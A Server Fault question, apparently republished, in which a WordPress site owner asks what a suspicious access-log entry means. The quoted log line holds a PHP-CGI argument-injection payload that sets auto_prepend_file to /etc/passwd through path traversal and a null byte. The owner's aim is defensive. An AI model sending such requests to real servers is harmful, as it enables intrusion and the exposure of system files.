Someone try to hack my site, want to understand the log
Posted
by
garconcn
on Server Fault
See other posts from Server Fault
or by garconcn
Published on 2012-09-06T05:01:11Z
Indexed on
2012/09/06
9:40 UTC
Read the original article
Hit count: 205
hacking
I have a wordpress site hosted on CentOS 6. After see the following access log, I checked the server, it seems ok. Can anyone explain what does this guy trying to do? Did they get what they want?
I have disabled allow_url_include, and restricted open_basedir to web dir and tmp(/etc is not in the path).
190.26.208.130 - - [05/Sep/2012:21:24:42 -0700] "POST http://my_ip/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 32656 "-" "Mozilla/5.0"
© Server Fault or respective owner